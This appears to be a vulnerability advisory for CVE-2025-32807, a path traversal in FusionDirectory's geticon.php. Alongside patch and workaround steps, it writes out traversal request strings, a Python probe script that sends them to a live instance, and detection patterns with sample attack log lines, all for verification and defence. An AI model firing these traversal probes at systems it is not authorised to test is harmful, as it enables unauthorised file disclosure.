CVE-2025-32807
📋 TL;DR
A path traversal in FusionDirectory's geticon.php lets an unauthenticated remote attacker put ../ sequences in the icon parameter and read files outside the icon theme directory. The read is limited to files that end in .png, .svg, or .xpm and that the web server user can open. It affects FusionDirectory releases before 1.5 that are reachable from untrusted networks.
💻 Affected Systems
- FusionDirectory, releases before 1.5 (the fix is recorded in the 1.5 changelog linked below)
⚠️ Manual Verification Required
The NVD entry for this CVE carries no structured version ranges, so automated product/version matching cannot decide whether a given installation is affected.
Why? The vendor/NVD data lists no affected-version range, only the prose description. The vendor changelog linked under Fix & Mitigation records the fix in 1.5, so treat every earlier release as affected until you have verified it yourself.
- Review the CVE details at NVD
- Check vendor security advisories for your specific version
- Test if the vulnerability is exploitable in your environment
- Consider updating to the latest version as a precaution
⚠️ Risk & Real-World Impact
Worst Case
The web server user reads any .png, .svg, or .xpm file on the host that the attacker can name, whichever application owns it: image assets of other web applications on the same server, user-uploaded pictures, or diagrams and screenshots stored with those extensions. Configuration files and password stores are not reachable directly because of the extension restriction, but what is disclosed can feed reconnaissance for a further attack.
Likely Case
Disclosure of image files outside the icon theme tree; the practical value to the attacker depends on what else is hosted on the machine.
If Mitigated
Limited impact when FusionDirectory is reachable only from trusted networks, the web server user cannot read other applications' files, and PHP's open_basedir confines file access to the FusionDirectory installation and its theme directories.
🎯 Exploit Status
A single crafted GET request to geticon.php; no authentication is required because the endpoint serves the interface's icons and is reachable before login. The only constraint on the attacker is that the target file must end in .png, .svg, or .xpm.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 1.5
Vendor Advisory: https://gitlab.fusiondirectory.org/fusiondirectory/fd/-/blob/e9304844fb5c8ce4a9af9e26858af5e22e15b9bd/Changelog.md?plain=1#L112
Restart Required: No
Instructions:
1. Back up the current installation (application directory and configuration).
2. Update to FusionDirectory 1.5 or later.
3. Verify the patch: geticon.php (or the IconTheme class it calls) must reject an icon value containing ../ sequences. The fix commit under References shows the exact change, and the probe under How to Verify must no longer return the target file.
🔧 Temporary Workarounds
Web Server Access Restriction
Deny access to geticon.php in the web server configuration. Caveat: FusionDirectory serves its theme icons through this script, so denying it removes icons from the whole interface; use it only as a short-lived stopgap. A narrower alternative is a rewrite rule that returns 403 when the icon query parameter contains .. or one of its percent-encoded forms (%2e%2e, %2e., .%2e), which keeps the interface usable.
# For Apache: add to .htaccess (requires AllowOverride) or the virtual host config
<Files "geticon.php">
Require all denied
</Files>
# For Nginx: add to the server block; adjust the path to your install prefix (e.g. /fusiondirectory/geticon.php)
location = /geticon.php {
deny all;
}
File Permission Restriction
Permissions on the FusionDirectory directory itself do not limit this bug: the traversal leaves that directory and reads as the web server user. What helps is making sure that user (www-data below) cannot read image files belonging to other applications or users on the host, and confining PHP with an open_basedir that lists only the FusionDirectory installation and its theme directories. Independently of that, keep the application tree owned by root and not writable by the web server user:
chmod 750 /var/www/html/fusiondirectory
chown root:www-data /var/www/html/fusiondirectory
🧯 If You Can't Patch
- Restrict access to FusionDirectory to trusted internal networks (firewall, VPN, or reverse-proxy allow-list); the endpoint is usable without credentials, so exposure is the main risk factor.
- Put a web application firewall in front of it with path traversal rules, and confirm the rules also catch percent-encoded variants of the icon parameter (%2e%2e/, %2e./, .%2e/), not only the literal ../.
🔍 How to Verify
Check if Vulnerable:
Send a GET request to /geticon.php?icon=../../../etc/passwd.png and see whether file contents come back. Caveat: the page's own description limits reads to files ending in .png, .svg, or .xpm, so /etc/passwd is not a valid target and this request can only produce a false negative. For a reliable check, create a canary PNG the web server user can read (for example /tmp/fd-canary.png with known bytes), request it with the same traversal prefix, and try several depths of ../, since the number of levels depends on the theme directory layout. Only a 200 response whose body equals the canary confirms the vulnerability; a 404 or the theme's default icon proves nothing either way.
Check Version:
grep -rn 'VERSION' /var/www/html/fusiondirectory/include/variables*
Adjust the path to your installation (packaged installs commonly live under /usr/share/fusiondirectory). Anything below 1.5 is affected.
Verify Fix Applied:
After patching, repeat the same requests, including the canary variant at every depth you tried before; they should return an error or the default icon, never the bytes of the target file.
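Added example (not code from the page or the FusionDirectory project): a Python probe that implements the canary check against a live instance. It uses a canary file rather than /etc/passwd because the page's own description limits reads to .png/.svg/.xpm files. The context=applications and size=16 parameters, the traversal depths 3 to 10, the canary path /tmp/fd-canary.png and the host fd.example are assumptions that do not come from the advisory, and the canary bytes are constructed here. Because the advisory does not state whether geticon.php appends the extension itself, each depth is tried with and without .png.

```python
"""Probe a FusionDirectory instance for CVE-2025-32807 with a canary file.

Added example, not FusionDirectory project code. Assumptions (not stated on
the page): context=applications, size=16, traversal depths 3..10, the canary
path /tmp/fd-canary.png and the hypothetical host fd.example.
"""
import posixpath
import urllib.error
import urllib.request
from urllib.parse import quote

# Constructed canary content: a PNG signature followed by a marker string.
# Write exactly these bytes to the canary path on the server before probing.
CANARY_PNG = b"\x89PNG\r\n\x1a\n" + b"cve-2025-32807-canary"


def probe_url(base_url, target_path, depth):
    """Build the geticon.php request that climbs `depth` directories and then
    descends into target_path. quote() leaves '.' and '/' alone, so the
    traversal is sent literally, like the request quoted on the page."""
    icon = "../" * depth + target_path.lstrip("/")
    return (f"{base_url.rstrip('/')}/geticon.php"
            f"?context=applications&icon={quote(icon)}&size=16")


def http_fetch(url, timeout=10):
    """Default fetcher: returns (status, body). HTTP and connection errors
    become a result instead of an exception so the scan keeps going."""
    req = urllib.request.Request(url, headers={"User-Agent": "cve-2025-32807-check"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as err:   # 4xx/5xx: body is still useful
        return err.code, err.read()
    except urllib.error.URLError:           # DNS/connection failure
        return 0, b""


def candidate_targets(canary_path):
    """The advisory does not say whether geticon.php appends the extension,
    so try the path both with and without it (assumption)."""
    stem, ext = posixpath.splitext(canary_path)
    return [canary_path, stem] if ext else [canary_path]


def check(base_url, canary_path, canary_bytes, fetch=http_fetch, depths=range(3, 11)):
    """Return a dict describing the first request whose body equals the canary.

    Only a 200 whose body is byte-for-byte the canary counts: a 404 or the
    theme's default icon looks the same on a patched server and proves nothing.
    """
    attempts = 0
    for depth in depths:
        for target in candidate_targets(canary_path):
            url = probe_url(base_url, target, depth)
            status, body = fetch(url)
            attempts += 1
            if status == 200 and body == canary_bytes:
                return {"vulnerable": True, "url": url, "status": status,
                        "depth": depth, "attempts": attempts}
    return {"vulnerable": False, "attempts": attempts}


if __name__ == "__main__":
    import sys
    base = sys.argv[1] if len(sys.argv) > 1 else "https://fd.example"  # hypothetical host
    print(check(base, "/tmp/fd-canary.png", CANARY_PNG))
```

Write the CANARY_PNG bytes to /tmp/fd-canary.png on the server (readable by the web server user), run the script with your base URL (including any /fusiondirectory prefix), and delete the canary afterwards. A result with vulnerable True carries the exact URL and depth that returned the canary; repeat after upgrading to 1.5 and expect vulnerable False.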
📡 Detection & Monitoring
Log Indicators:
- GET requests to geticon.php whose icon parameter contains ../ or a percent-encoded form of it (%2e%2e/, %2e./, .%2e/)
- 200 responses to such requests with a non-zero byte count: an attempt that returned a file, as opposed to a 404 or the small default icon
Network Indicators:
- HTTP requests to geticon.php whose icon value carries traversal sequences and ends in .png, .svg, or .xpm, typically from one source iterating over ../ depths or candidate paths
SIEM Query:
source="web_server_logs" AND uri="*/geticon.php?*" AND (uri="*icon=*../*" OR uri="*icon=*%2e%2e*" OR uri="*icon=*%2e.*" OR uri="*icon=*.%2e*")
Field names and wildcard syntax are SIEM-specific; match case-insensitively so that %2E is caught as well, and rank hits with status 200 and bytes > 0 first.
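Added example (not from the page or the FusionDirectory project): detection logic in Python that applies the indicators above to Apache/Nginx combined-format access log lines. The four log lines are constructed samples, and the /fusiondirectory prefix, addresses and timestamps in them are assumptions. The code decodes the icon parameter once, as PHP does for $_GET, so percent-encoded traversal is caught alongside the literal ../, and it marks a 200 with a non-zero body as a likely successful read.

```python
"""Flag geticon.php requests whose icon parameter contains a path traversal.

Added example, not from the page or the FusionDirectory project. Assumes the
combined log format; the sample lines below are constructed.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Combined log format: ip ident user [time] "METHOD target PROTO" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-)'
)

# Constructed samples: a literal traversal that returned a file, a percent-encoded
# one that missed, a legitimate icon request, and an unrelated request.
SAMPLE_LOG = """\
203.0.113.5 - - [10/May/2025:10:15:01 +0000] "GET /fusiondirectory/geticon.php?context=applications&icon=../../../../tmp/fd-canary.png&size=16 HTTP/1.1" 200 1432 "-" "curl/8.5.0"
203.0.113.5 - - [10/May/2025:10:15:02 +0000] "GET /fusiondirectory/geticon.php?context=applications&icon=%2e%2e%2f%2e%2e%2f%2e%2e%2fvar%2fwww%2fother%2flogo.svg&size=16 HTTP/1.1" 404 0 "-" "curl/8.5.0"
198.51.100.7 - - [10/May/2025:10:16:10 +0000] "GET /fusiondirectory/geticon.php?context=applications&icon=utilities-terminal&size=16 HTTP/1.1" 200 512 "https://fd.example/" "Mozilla/5.0"
198.51.100.7 - - [10/May/2025:10:16:11 +0000] "GET /fusiondirectory/index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""


def icon_param(target):
    """Decoded icon parameter of a geticon.php request target; None for other requests."""
    parts = urlsplit(target)
    if not parts.path.endswith("/geticon.php"):
        return None
    # parse_qs percent-decodes once, exactly as PHP does for $_GET, so
    # %2e%2e%2f and the literal ../ both come out as '../'.
    values = parse_qs(parts.query, keep_blank_values=True).get("icon")
    return values[0] if values else None


def has_traversal(icon):
    """True if any path component of the (already decoded) icon value is '..'.
    Backslash is accepted as a separator too, to be conservative."""
    return any(seg == ".." for seg in re.split(r"[\\/]+", icon))


def scan(log_text):
    """One finding per traversal attempt; likely_read marks a 200 with a non-empty body."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        icon = icon_param(m["target"])
        if icon is None or not has_traversal(icon):
            continue
        status = int(m["status"])
        size = 0 if m["bytes"] == "-" else int(m["bytes"])
        findings.append({
            "ip": m["ip"], "ts": m["ts"], "icon": icon,
            "status": status, "bytes": size,
            "likely_read": status == 200 and size > 0,
        })
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        flag = "READ" if f["likely_read"] else "attempt"
        print(f'{f["ts"]} {f["ip"]} {flag} status={f["status"]} bytes={f["bytes"]} icon={f["icon"]}')
```

Feed it your real access log instead of SAMPLE_LOG; entries flagged READ deserve the first look, and a burst of attempts from one address stepping through ../ depths is the scanning pattern to expect.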
🔗 References
- https://gitlab.fusiondirectory.org/fusiondirectory/fd/-/blob/e9304844fb5c8ce4a9af9e26858af5e22e15b9bd/Changelog.md?plain=1#L112
- https://gitlab.fusiondirectory.org/fusiondirectory/fd/-/blob/e9304844fb5c8ce4a9af9e26858af5e22e15b9bd/include/class_IconTheme.inc#L233-237
- https://gitlab.fusiondirectory.org/fusiondirectory/fd/-/commit/9edefd0b367450d665a141c5e94db8a06d208556